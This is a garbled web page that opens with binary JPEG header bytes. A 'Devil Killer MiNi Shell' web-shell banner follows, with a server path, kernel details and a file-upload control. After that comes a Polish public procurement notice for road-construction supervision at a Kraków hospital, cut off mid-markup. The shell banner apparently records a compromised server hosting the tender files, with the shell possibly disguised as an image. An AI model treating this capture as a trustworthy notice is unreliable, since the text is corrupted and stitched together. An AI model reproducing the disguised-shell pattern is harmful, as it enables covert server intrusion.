JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240226/0021870401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa pełnienia funkcji Inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej nad realizacją robót budowlano-instalacyjnych - ZP-6/24 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Kliniczny im. dr. J. Babińskiego SPZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000298554</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">dr. Józefa Babińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-393</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@babinski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.babinski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa pełnienia funkcji Inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej nad realizacją robót budowlano-instalacyjnych - ZP-6/24 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1f84e92d-d48f-11ee-a3b5-e25d731b0da9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00218704</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-02-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00561717/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Usługa pełnienia funkcji Inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/szpital_babinski <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/szpital_babinski</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski <br/>2. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego Wykonawcy. <br/>3. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na stronie internetowej. <br/>4. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje <br/>5. Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne z Obwieszczeniem Prezesa Rady Ministrów z 09.11.2017r. w sprawie ogłoszenia jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych. a) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg). b) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip i .7Z<br/>6. Zaleca się, aby komunikacja z Wykonawcami odbywała się tylko na Platformie za pośrednictwem formularza “Wyślij wiadomość do Zamawiającego”, nie za pośrednictwem adresu email. <br/>7. Wykonawca ofertę oraz przedmiotowe środki dowodowe (jeżeli są wymagane w SWZ) składa pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/szpital_babinski na stronie internetowej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-6/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem postępowania jest udzielenie zamówienia w zakresie pełnienia funkcji Inspektora nadzoru inwestorskiego branży budowlanej w specjalności inżynieryjnej drogowej nad realizacją robót drogowych budowlano-instalacyjnych, w ramach inwestycji pn.: „Przebudowa i rozbudowa dróg, chodników i parkingów na terenie Zespołu szpitalno-parkowego w Krakowie-Kobierzynie”.<br/>2.	Przedmiot zamówienia obejmuje sprawowanie nadzoru inwestorskiego nad kompleksową realizacją inwestycji zgodnie z przepisami ustawy Pr. Bud. (w szczególności art. 25 i 26 ustawy Pr. Bud.) oraz rozporządzeń wykonawczych do tej ustawy, a w szczególności:<br/>1) Zapoznanie się z dokumentacją projektową i kosztorysową oraz przedstawienie Zamawiającemu pisemnej opinii, co do jej kompletności, jakości oraz ewentualnych wad.<br/>2) Zapoznanie się z umową zawartą z wykonawcą robót bud.-inst. oraz opiniowanie ewentualnych późniejszych jej zmian. <br/>3) Współpraca w opracowywaniu Harmonogramu rzeczowo-finansowego zamówienia podstawowego inwestycji oraz opiniowanie ewentualnych późniejszych zmian w tym zakresie. <br/>4) Współpraca z Zamawiającym w zakresie administrowania nadzorowaną inwestycją, np.: przekazywanie informacji o stanie zaawansowania robót pod względem rzeczowym i finansowym, informacji o zagrożeniach, problemach technicznych i organizacyjnych, konfliktach, itp.<br/>5) Bieżący nadzór nad prawidłową realizacją przez wykonawcę robót bud.-inst., zgodnie z wszelkimi wymaganiami tej umowy i dokumentacji projektowej stanowiącej załącznik do post. o udzielenia zam. publ. ZP-4/24. Współpraca z Zamawiającym przy egzekwowaniu realizacji przez wykonawcę postanowień umowy na roboty bud.-inst.<br/>6) Analiza proponowanych przez projektanta i/lub wykonawcę robót budowlano-instalacyjnych rozwiązań projektowych i wykonawczych, ich bieżąca kontrola pod kątem kosztów realizacji inwestycji i późniejszej eksploatacji, w tym analiza i pisemne opiniowanie propozycji zmian technologii wykonania robót bud.-inst. oraz rodzaju materiałów.<br/>7) Przekazywanie wykonawcy robót bud.-inst. terenów budowy/robót oraz bieżące kontrolowanie prawidłowości zabezpieczenia terenów budowy/robót przed osobami postronnymi. Przekazywanie terenów budowy/robót nastąpi zgodnie z Harmonogramem rzeczowo-finansowym zamówienia podstawowego inwestycji, o którym mowa w pkt. 3) powyżej i w przypadku robót bud.-inst. realizowanych w ramach prawa opcji – w terminie wyznaczonym przez Zamawiającego, na piśmie pod rygorem nieważności.<br/>8) Reprezentowanie Zamawiającego na budowie we wszystkich kwestiach technicznych i organizacyjnych związanych z realizacją inwestycji, poprzez sprawowanie kontroli zgodności jej realizacji z dokumentacją przetargową, projektową, umową zawartą z wykonawcą robót bud.-inst., umowami wykonawcy robót budowlano-instalacyjnych zawartymi z podwykonawcami, zakresem koniecznych do wykonania prac, przepisami i obowiązującymi Polskimi Normami, zasadami wiedzy technicznej oraz zasadami bezpieczeństwa w trakcie budowy i przyszłego użytkowania. <br/>9) Sprawdzanie na bieżąco jakości wykonywanych robót bud.-inst., wbudowanych urządzeń, materiałów i wyrobów budowlanych, a w szczególności zapobieganie zastosowaniu urządzeń, materiałów i wyrobów budowlanych wadliwych i niedopuszczonych do obrotu i stosowania w budownictwie lub nie spełniających wymaganych parametrów technicznych.<br/>10) Sprawdzanie i egzekwowanie posiadania przez wykonawcę robót budowlano-instalacyjnych odpowiednich dokumentów (np. atestów, certyfikatów wyrobów i materiałów, świadectw jakości, wyników badań) dotyczących materiałów, wyrobów i urządzeń przed ich wbudowaniem, a także ich przekazywanie na każde żądanie Zamawiającego. Sprawdzenie kompletności i prawidłowości operatu kolaudacyjnego oraz dokumentacji powykonawczej. Zatwierdzanie rysunków wykonawczych, warsztatowych, rewizji do rysunków wykonawczych i powykonawczych sporządzonych przez wykonawcę robót bud.-inst. i ich archiwizowanie.<br/>11) Sprawdzanie zgodności parametrów montowanych urządzeń i materiałów z parametrami określonymi w dokumentacji przetargowej i projektowej. Nakazywanie wykonawcy robót bud.-inst. wykonania dodatkowych badań montowanych urządzeń i materiałów budzących wątpliwość co do ich jakości po uprzedniej akceptacji Zamawiającego.<br/>12) Bieżące rozwiązywanie problemów technicznych i organizacyjnych na terenie budowy, rozstrzyganie wątpliwości związanych z wykonywanymi robotami bud.-inst., a w przypadku braku możliwości ich rozstrzygnięcia niezwłoczne, pisemne zawiadomienie o tym fakcie Zamawiającego.<br/>13) Sporządzanie na wezwanie Zamawiającego pisemnych bieżących informacji o przebiegu i stanie realizacji inwestycji, umożliwiających Zamawiającemu sukcesywne sporządzanie wymaganej sprawozdawczości inwestycyjnej.<br/>14) Bieżące informowanie Zamawiającego o postępach robót, pojawiających się trudnościach w realizacji inwestycji oraz wszelkich okolicznościach, które mogą mieć wpływ na terminowość, koszty, poprawność wykonania robót bud.-inst. oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej.<br/>15) Sprawdzanie i dokonywanie odbiorów robót zanikających i ulegających zakryciu, częściowych i końcowych, w tym zamontowanych urządzeń i wyposażenia. Uczestniczenie w prowadzonych badaniach, próbach i odbiorach technicznych (również tych prowadzonych przez dysponentów sieci). <br/>16) Udział w odbiorach częściowych i końcowych jako potwierdzanie wykonanych robót bud.-inst., zatwierdzanie protokołów odbiorów częściowych i końcowych, stanowiących podstawę do fakturowania przez wykonawcę robót bud.-inst.; w tym w szczególności:<br/>a) potwierdzenie gotowości do odbioru, wyznaczenie terminu odbioru zgodnego z zawartą z wykonawcą robót bud.-inst. umową;<br/>b) przewodniczenie komisji odbiorów robót, a następnie przeprowadzenie odbiorów wraz ze sporządzeniem protokołów;<br/>c) kompletowanie, sprawdzenie a następnie przekazanie Zamawiającemu dokumentacji powykonawczej, o której mowa w umowie z wykonawcą robót bud.-inst., w tym również przejęcie od wykonawcy robót bud.-inst. i sprawdzenie kompletności wszystkich wymaganych instrukcji eksploatacyjnych, ruchowych i przekazanie ich Zamawiającemu;<br/>d) nadzorowanie usuwania stwierdzonych podczas odbiorów usterek/wad oraz pisemne potwierdzanie ich usunięcia;<br/>e) informowanie Zamawiającego o zasadności naliczenia kar umownych wykonawcy robót bud.-inst. zgodnie z zawartą umową pomiędzy Zamawiającym a wykonawcą robót bud.-inst.<br/>17) Sprawdzanie i zatwierdzanie poprawności dokumentów przed odbiorowych sporządzonych i dostarczonych przez wykonawcę robót bud.-inst., w zakresie sprawowanego nadzoru inwestorskiego.<br/>18) Przyjmowanie i opiniowanie ewentualnych wniosków wykonawcy robót bud.-inst. dotyczących konieczności wykonania robót dodatkowych lub zamiennych lub ograniczenia ich zakresu, wraz z przedłożeniem ich do akceptacji Zamawiającemu oraz sporządzanie protokołów konieczności wykonania robót dodatkowych lub zamiennych lub protokołu ograniczenia inwestycji, zgodnie z przepisami prawa, w tym w szczególności ustawy Prawo budowlane oraz ustawy Prawo zamówień publicznych. Wykonawca ma obowiązek sprawdzania kosztorysów ewentualnych robót dodatkowych lub zamiennych pod względem merytorycznym, formalno – prawnym i kosztowym.<br/>Wykonawca ma obowiązek niezwłocznego poinformowania Zamawiającego o możliwości wystąpienia powyżej określonych rodzajów robót i ewentualnych wnioskach Wykonawcy w tych zakresach. <br/>Bez pisemnej zgody Zamawiającego Wykonawca, tj. Inspektor nadzoru inwestorskiego nie jest upoważniony do wydawania wykonawcy robót budowlano-instalacyjnych polecenia wykonania robót dodatkowych, zamiennych lub ograniczenia ich zakresu.<br/>19) Nadzór nad przestrzeganiem przez wykonawcę robót bud.-inst. na terenie budowy/robót przepisów p.poż i bhp oraz egzekwowanie zachowania porządku na budowie, a także przestrzegania przepisów w zakresie ochrony środowiska, w szczególności ustawy o odpadach.<br/>20) Sporządzanie na bieżąco dokumentacji fotograficznej przed i w trakcie prowadzenia robót bud.-inst., na każdym etapie robót, i jej przekazywanie Zamawiającemu w wyznaczonym przez Zamawiającego terminie.<br/>21) Obecność i pobyt na terenie budowy/robót (w tym pobyt w siedzibie Zamawiającego, według jego potrzeb) co najmniej trzy razy w tygodniu, po minimum 5 godzin, w godzinach. 8:00 – 15:00; Zamawiający i Wykonawca wspólnie pisemnie ustalą dni świadczenia Usługi w ujęciu miesięcznym; obecność i pobyty każdorazowo będą udokumentowane, pod rygorem naliczenia kary umownej.<br/>22) Obecność na naradach koordynacyjnych organizowanych przez Zamawiającego (według potrzeb Zamawiającego i w terminach wyznaczonych przez Zamawiającego), pod rygorem naliczenia kary umownej.<br/>23) Zapewnienie przyjazdu Wykonawcy na teren budowy/robót w czasie do 8 godzin od telefonicznego wezwania przez Zamawiającego lub wykonawcę robót bud.-inst., a w przypadkach awaryjnych (zdarzenia na budowie zagrażające bezpieczeństwu) do 4 godzin. <br/>24) Zamawiający przewiduje możliwość zmiany liczby dni obecności i pobytu Wykonawcy na terenie budowy/robót, o których mowa w pkt 21 - 23. Ostateczna decyzja co do zmiany leży w gestii Zamawiającego, co oznacza, że w przypadku zaproponowania takiej zmiany przez Zamawiającego, Wykonawca zobowiązany jest zmianę taką zaakceptować; każdorazowa zmiana wymaga pisemnej pod rygorem nieważności zgody Zamawiającego; powyższa zmiana nie stanowi zmiany umowy i nie wymaga sporządzenia aneksu do umowy. <br/>25) Wykonywanie wszelkich innych czynności gwarantujących prawidłowy i terminowy przebieg inwestycji, w tym bieżąca koordynacja prac wszystkich uczestników procesu budowlanego.<br/>26) Udzielanie wszystkich niezbędnych informacji na potrzeby sprawozdawczości z realizacji projektu w całym okresie jego realizacji.<br/>27) Wykonawca jest obowiązany wykazywać inicjatywę osiągania oszczędności i obniżki kosztów budowy oraz ujawniania występujących na budowie nieprawidłowości i im przeciwdziałania, powiadamiając i współdziałając przy tym z Zamawiającym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Wykonawca świadczył będzie Usługę – w ramach zamówienia podstawowego i zamówienia w ramach prawa opcji. <br/>a) W ramach zamówienia podstawowego Wykonawca świadczył będzie Usługę nad realizacją następujących etapów robót budowlano-instalacyjnych:<br/>1) Pierwszy etap – Odcinek 5<br/>2) Drugi etap – Odcinek 6 <br/>3) Trzeci etap – Odcinek 7 <br/>4) Czwarty etap – Odcinek 10 <br/>5) Piąty etap - Odcinek 11 <br/>6) Szósty etap – Odcinek 12 <br/>7) Siódmy etap – Odcinek 16 <br/>8) Ósmy etap – Odcinek 17 <br/>9) Dziewiąty etap – Odcinek 18 <br/>10) Dziesiąty etap – Odcinek 19 <br/>b) W ramach zamówienia w prawie opcji Wykonawca świadczył będzie Usługę nad realizacją następujących etapów robót budowlano-instalacyjnych:<br/>1) Jedenasty etap – Odcinek 1 <br/>2) Dwunasty etap – Odcinek 2 <br/>3) Trzynasty etap – Odcinek 3 <br/>4) Czternasty etap – Odcinek 4 <br/>5) Piętnasty etap – Odcinek 8 <br/>6) Szesnasty etap – Odcinek 9 <br/>7) Siedemnasty etap – Odcinek 13 <br/>8) Osiemnasty etap – Odcinek 15 <br/>9) Dziewiętnasty etap – Odcinek 20 <br/>opisane szczegółowo w dokumentacji projektowej pn.: „Przebudowa i rozbudowa dróg wewnętrznych wraz z budową, przebudową i rozbudową miejsc postojowych, parkingów, chodników i utwardzeń terenu, rozbudową i przebudową placów manewrowych, ciągów pieszych, budową szlabanów parkingowych oraz rozbudową instalacji zewnętrznej elektrycznej i kanalizacji deszczowej obsługującej drogi oraz rozbiórka budynku usługowego obsługi parkingu zlokalizowanych na terenie Zespołu Szpitalno-Parkowego w Krakowie-Kobierzynie”, autorstwa Pracowni Projektowej Mariusz Pawelec z siedzibą w Krakowie, która stanowi dokumentację postępowania o udzielenie zamówienia publicznego nr ZP-4/24, objętej decyzją pozwolenia na budowę dla przedmiotowej inwestycji.<br/>Dokumenty dostępne są na stronie: https://platformazakupowa.pl/transakcja/886444<br/>2.	PRAWO OPCJI – Zamawiający, zgodnie z art. 441 ustawy Pzp, może skorzystać z prawa opcji w zakresie realizacji Usługi osobno dla każdego z etapów - od etapu Jedenastego do etapu Dziewiętnastego, na następujących zasadach:<br/>1) skorzystanie z prawa opcji nie stanowi zmiany niniejszej umowy,<br/>2) zlecenie realizacji Usługi w ramach prawa opcji może, ale nie musi nastąpić w zależności od zapotrzebowania Zamawiającego oraz wysokości środków finansowych przyznanych Zamawiającemu na ten cel (dotacja). <br/>3) realizacja Usługi w ramach prawa opcji może być zlecona Wykonawcy:<br/>a) w całości, co oznacza, że Zamawiający może zlecić Wykonawcy realizację Usługi w ramach wszystkich dziewięciu etapów, lub<br/>b) w części, co oznacza, że Zamawiający może zlecić Wykonawcy realizację Usługi w ramach danego poszczególnego etapu (jednego lub kilku, od etapu Jedenastego do etapu Dziewiętnastego) w całości lub części, lub<br/>c) wcale,<br/>4) W przypadku skorzystania przez Zamawiającego z prawa opcji, wynagrodzenie przysługuje Wykonawcy z tytułu realizacji zleconej Wykonawcy Usługi w ramach danego etapu.<br/>5) Wykonawcy nie przysługuje prawo domagania się realizacji Usługi w zakresie prawa opcji, jeżeli Zamawiający nie skorzysta z przedmiotowego prawa. Nieskorzystanie przez Zamawiającego z prawa opcji nie wymaga podania przyczyny i nie stanowi podstawy do dochodzenia względem niego odpowiedzialności z tytułu niewykonania umowy.<br/>6) Ewentualne skorzystanie przez Zamawiającego z prawa opcji będzie polegało na przekazaniu przez Zamawiającego względem Wykonawcy oświadczenia w przedmiocie skorzystania z tego prawa ze zleceniem realizacji Usługi odpowiednio w ramach osobno każdego z etapów (od etapu Jedenastego do etapu Dziewiętnastego), na warunkach określonych w umowie. Dla oświadczenia Zamawiającego wskazanego w zdaniu poprzednim Strony przewidują formę pisemną pod rygorem nieważności.<br/>7) W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji na warunkach określonych w umowie, co Wykonawca akceptuje przez podpisanie umowy (załącznik nr 4 do SWZ).<br/>8) Szczegółowe zasady skorzystania przez Zamawiającego z prawa opcji określone zostały we wzorze umowy załączniku nr 4 do SWZ. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 